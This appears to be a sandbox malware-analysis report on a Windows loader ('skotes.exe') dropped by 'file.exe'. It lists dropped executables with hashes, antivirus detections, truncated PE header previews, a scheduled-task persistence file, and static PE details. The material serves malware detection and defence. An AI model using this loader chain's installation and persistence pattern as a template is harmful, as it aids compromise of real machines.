Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1828864
Entropy (8bit):	7.946744834850696
Encrypted:	false
SSDEEP:	49152:DGZ7B/UHM0R0LVzVb1bRe8gCPI2nSt5BQg8/cR:DGPqOVzZgEc5BQ3/c
MD5:	C31FE40F860B41C8CC1762C03C73B877
SHA1:	50B66CDACE74107CF7C81F3E44FCA9950EF056E6
SHA-256:	4689172CE4CF5350001ABF8A32DFF840A4E677647C0368B4901F07EF199AEBA8
SHA-512:	F34ED9D4D9103819ADB33AF73C8FE1EE0BC8A643A2A21747C71BE0085D2B0B7D2F9964F76CD672ECB97A051E4852973692CFB772F7561C5A7F529F6B476A9F18
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................*.......pj...........@...........................j...........@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... .P+...$......\|..............@...vdtghsqu.P....P..B...~..............@...cyxsntsn.....`j.....................@....taggant.0...pj.."..................@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	727552
Entropy (8bit):	7.888061454157426
Encrypted:	false
SSDEEP:	12288:tyNudyx57oPuBlhyyZzWDtkfDdEIHiyO+rBlhyyZzWDtkfDdEIHiyO+N:t+3x5s2BCyqXIdXBCyqXId5
MD5:	28E568616A7B792CAC1726DEB77D9039
SHA1:	39890A418FB391B823ED5084533E2E24DFF021E1
SHA-256:	9597798F7789ADC29FBE97707B1BD8CA913C4D5861B0AD4FDD6B913AF7C7A8E2
SHA-512:	85048799E6D2756F1D6AF77F34E6A1F454C48F2F43042927845931B7ECFF2E5DE45F864627A3D4AA061252401225BBB6C2CAA8532320CCBE401E97C9C79AC8E5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....$Xg.................N..........,6............@..........................P......\|z....@.................................l...d...................................................................8h..............4...d............................text...AM.......N.................. ..`.rdata..<~...`.......V..............@..@.data...L...........................@....rsrc...............................@..@.reloc..............................@..B.bss.........0......................@....bss................................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	406528
Entropy (8bit):	7.752444648955333
Encrypted:	false
SSDEEP:	6144:3doOpYMkIn20q2g/wGlUoiv2hJHX0pD0oeiRMJU1bgALigxYJ/yRamWpdWNLGZjr:3doOphZg4r72fX0h0KRMO2wn3Ru8oJf
MD5:	15A1CAF203C034ACFF6EB99EB66C5CF9
SHA1:	EF4ED9E0D1C016E8E125C149EA7C9BE108B3F3FD
SHA-256:	AD0025FF91B8339B11EF619BB57A2F1EFCACAAF0CCC16A0A0DC704AD0C18DCA3
SHA-512:	4792D8479DEFEC36887C407972505D2112ABAB31AAADDBBA6D055A8BD24A6B8157F9D57428FC7E645D52C62D3F26F7962F1525E9B1FB61D9F5814D8630E6A16F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...bI\g..........".................\L............@.......................................@.................................D~..(....................................................................(..................@............................text............................... ..`.rdata...r... ...t..................@..@.data...............................@....OO.................................@....rsrc...............................@..@.reloc..............................@..B.bss................................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	970240
Entropy (8bit):	6.702649782040153
Encrypted:	false
SSDEEP:	24576:zqDEvCTbMWu7rQYlBQcBiT6rprG8aMa9V:zTvC/MTQYxsWR7aMi
MD5:	9BA5A9284F9E89843B0D21B2B2027B5E
SHA1:	2E4547FAB641C8EF0F6D2EAF05706E9A16360FF8
SHA-256:	6D9D77738D9B5CBB78A8833F30664C96908C6101AA0B2757EBD829FD3904F668
SHA-512:	73A5AD331455274C6E4BC63FC4DB9415A97742B953091A14AD08C88E324764B0F41C618C48AAE6BB7CF1295E1AFB1CB3D180D0D806A0339A7921F9FFE5ABDE13
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....d]g..........".................w.............@..........................0......V.....@...@.......@.....................d...\|....@..Lc.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...Lc...@...d..................@..@.reloc...u.......v...X..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1806336
Entropy (8bit):	7.94653585710947
Encrypted:	false
SSDEEP:	49152:pm4BBOcqqErfoWO/jRm8DxEydzhVi7Zj5tEL1z:pmYqJTon9EylhIV5tEL1z
MD5:	B355C3C7B4A5F5B7549D18FE732849D6
SHA1:	D1C1B51B5F5A862FDDCB35DB668232389369DC27
SHA-256:	39F2838FD920FC9B46C4DA04494257050F1898BB6BD8C4E101F5012F75BD5CD2
SHA-512:	572064D4AC94F539C6C0794E09E051CEC021C6D3CD56B675B8B18847F8F62E69E5A35D58D9EEF4ED313A2DC633A9027C8460D06D8F17804809AB4B29DB3C1D95
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.............................i...........@..........................@i.....B.....@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... .P...$......\|..............@...vknblbix......O......~..............@...fyoeglui......i......j..............@....taggant.0....i.."...n..............@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2794496
Entropy (8bit):	6.436684166573185
Encrypted:	false
SSDEEP:	49152:Hc6Q9e6igDpgDaF0yMRuHDvls/vJOvrPzO94eRv:86Q93iepg+F0yMRoDvlsAfS3v
MD5:	77FF02A2735099E1749EDD45856697EB
SHA1:	4975285DD4AC2842D8BCA8711DC2ABD59CDB1398
SHA-256:	E35E1B3B6D9C421859C8CA39AA2D485DD3B1EC8454E1488AB4C708E41AA1D455
SHA-512:	1FEDAA230D46488BA8D6E8EE7B0C186638DA1B436111BD4001905A54DE215AA13A30CF7B8ED90C348AC465E6C1E33B40D4E2F77D77C01DA3DB4B718F315AE69A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$........... +.. ...`....@.. .......................`+......M+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...titmuczc.`......D..:..............@...zslsucpn. ....+......~.............@....taggant.@... +..".................@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1015169001\f0cbba1288.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4438776
Entropy (8bit):	7.99505709582503
Encrypted:	true
SSDEEP:	98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
MD5:	3A425626CBD40345F5B8DDDD6B2B9EFA
SHA1:	7B50E108E293E54C15DCE816552356F424EEA97A
SHA-256:	BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
SHA-512:	A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...\|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

C:\Users\user\AppData\Local\Temp\1015170001\fe1ffe1825.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	727552
Entropy (8bit):	7.888061454157426
Encrypted:	false
SSDEEP:	12288:tyNudyx57oPuBlhyyZzWDtkfDdEIHiyO+rBlhyyZzWDtkfDdEIHiyO+N:t+3x5s2BCyqXIdXBCyqXId5
MD5:	28E568616A7B792CAC1726DEB77D9039
SHA1:	39890A418FB391B823ED5084533E2E24DFF021E1
SHA-256:	9597798F7789ADC29FBE97707B1BD8CA913C4D5861B0AD4FDD6B913AF7C7A8E2
SHA-512:	85048799E6D2756F1D6AF77F34E6A1F454C48F2F43042927845931B7ECFF2E5DE45F864627A3D4AA061252401225BBB6C2CAA8532320CCBE401E97C9C79AC8E5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....$Xg.................N..........,6............@..........................P......\|z....@.................................l...d...................................................................8h..............4...d............................text...AM.......N.................. ..`.rdata..<~...`.......V..............@..@.data...L...........................@....rsrc...............................@..@.reloc..............................@..B.bss.........0......................@....bss................................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2969600
Entropy (8bit):	6.514084815957461
Encrypted:	false
SSDEEP:	49152:I+1J1ySEuB942MaR8rlCRLI0dpZIaqfzsnGOXRFT:91fUuD42MiClILI0dHqfonZBF
MD5:	986A01646E19832CD4D612C37E1AC75B
SHA1:	C8463240DDE522EDB3F558E542665734346D5F1B
SHA-256:	DB29099D060B9ED6C0959E6B13A4B35C6B0893FD1870805C77F05AB6E57EEDF2
SHA-512:	1F9C100433F7BFF31C30B96DD2211035E2BF7D2C5F220CE2407E23FFB1F44C17E0052651D5F0A9BC364741F476A67F98EEA9E085C644384EC3C1289520F82AA7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@..........................01......=....@.................................W...k.......D.....................0...............................0..................................................... . ............................@....rsrc...D...........................@....idata ............................@...bkcrtoce.@......6.................@...amhigela......0......*-.............@....taggant.0....1.."....-.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.4593089050301797
Encrypted:	false
SSDEEP:	48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
MD5:	D910AD167F0217587501FDCDB33CC544
SHA1:	2F57441CEFDC781011B53C1C5D29AC54835AFC1D
SHA-256:	E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
SHA-512:	F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
Malicious:	false
Preview:	... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s\|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Windows WIN.INI
Category:	dropped
Size (bytes):	200
Entropy (8bit):	5.391255133360986
Encrypted:	false
SSDEEP:	3:tZAQUsjcmktYWwktUp/UNE2aT/P4WX1rDZjrEFwHQ3ZjrEFwslyy:JWtYWXtUp8babN1rDVEFycVEFL
MD5:	3FB561547A46AF02D6B00F86DC370634
SHA1:	914867E4C763611B441835A3FC0082359FBF7277
SHA-256:	5393F0E8D90EE6A26EAC13B81B83EDC0637487B3E427175021D7EC4CDE8E34A7
SHA-512:	0E05486A6B6AD65D3A95FCFE46BE6687DD47E311374F11DE89F9CFB8C301951D6BFE43FA24851A3E759B6F8AF69A5F593568FB61F576AB52941F6B2B6EE54BC8
Malicious:	false
Preview:	[Compatibility]..LastVersion=118.0.1_20230927232528/20230927232528..LastOSABI=WINNT_x86_64-msvc..LastPlatformDir=C:\Program Files\Mozilla Firefox..LastAppDir=C:\Program Files\Mozilla Firefox\browser..

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs-1.js

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	13245
Entropy (8bit):	5.49322511095217
Encrypted:	false
SSDEEP:	192:TnaRtLYbBp67hj4qyaaXv6K1HNlV5RfGNBw8drMSl:2e1qlitPcwb0
MD5:	B63BCEBB4974B12B1F745F1A369502E1
SHA1:	FEBDAD6C2FFE2749A1D418DDB721431C64E39D08
SHA-256:	61493E4E83BAFED0081FEA0AE3D4E16756D88E6DC96535D95C6621534663E6C6
SHA-512:	D21BCF52B44E18EFB80C1B0F5DA501C34F5AEDE031F81FFB8018C200FD643F6EBA5F352008537C61B39E3A3740F32259C93D437E88D3F426045A271C8EB73F93
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1734182406);..user_pref("app.update.lastUpdateTime.background-update-timer", 1734182406);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1734182406);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 169633

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	13245
Entropy (8bit):	5.49322511095217
Encrypted:	false
SSDEEP:	192:TnaRtLYbBp67hj4qyaaXv6K1HNlV5RfGNBw8drMSl:2e1qlitPcwb0
MD5:	B63BCEBB4974B12B1F745F1A369502E1
SHA1:	FEBDAD6C2FFE2749A1D418DDB721431C64E39D08
SHA-256:	61493E4E83BAFED0081FEA0AE3D4E16756D88E6DC96535D95C6621534663E6C6
SHA-512:	D21BCF52B44E18EFB80C1B0F5DA501C34F5AEDE031F81FFB8018C200FD643F6EBA5F352008537C61B39E3A3740F32259C93D437E88D3F426045A271C8EB73F93
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1734182406);..user_pref("app.update.lastUpdateTime.background-update-timer", 1734182406);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1734182406);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 169633

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.3959426717807752
Encrypted:	false
SSDEEP:	6:ZZVXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lX1ut0:ZPf2RKQ1CGAFAjzvYRQVMt0
MD5:	E7E03F4750E884D940DA2EB4D9658AAD
SHA1:	78F3609F35506BB3617F966EAA29A9EC73D2CBDA
SHA-256:	363DEF4C1CEDFEFC50B00730FE6E5C76F3FE733A99ED033FB7F64DC3EBC7E22B
SHA-512:	0D24A94AAB45850B75778BF1B90AE41A575800AE0CFD7546133AA08B4516E49B41FA4C378632D268EF3CF546CD577DAF36899D8220A3D093FCDE9CD280B55931
Malicious:	false
Preview:	.....C.%..O..&`3D..F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................8.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.514084815957461
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'969'600 bytes
MD5:	986a01646e19832cd4d612c37e1ac75b
SHA1:	c8463240dde522edb3f558e542665734346d5f1b
SHA256:	db29099d060b9ed6c0959e6b13a4b35c6b0893fd1870805c77f05ab6e57eedf2
SHA512:	1f9c100433f7bff31c30b96dd2211035e2bf7d2c5f220ce2407e23ffb1f44c17e0052651d5f0a9bc364741f476a67f98eea9e085c644384ec3c1289520f82aa7
SSDEEP:	49152:I+1J1ySEuB942MaR8rlCRLI0dpZIaqfzsnGOXRFT:91fUuD42MiClILI0dHqfonZBF
TLSH:	4DD51A62A81576CFE48A27B8D42BCDC2696D43F9471149C39C78A8BF7E73CC211B6C94
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x710000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FF24933B5AAh
ucomiss xmm5, dqword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x344	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x30e5ec	0x10	bkcrtoce
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x30e59c	0x18	bkcrtoce
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	3e7eb12be643043c74194ff9ed6482db	False	0.9968175238419619	data	7.972851971131473	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x344	0x400	982623c07c43a8169da5c3bd55ce4d06	False	0.4345703125	data	5.395849414192414	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bkcrtoce	0x6b000	0x2a4000	0x2a3600	f5045331c87234497088431f0f2ddc70	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
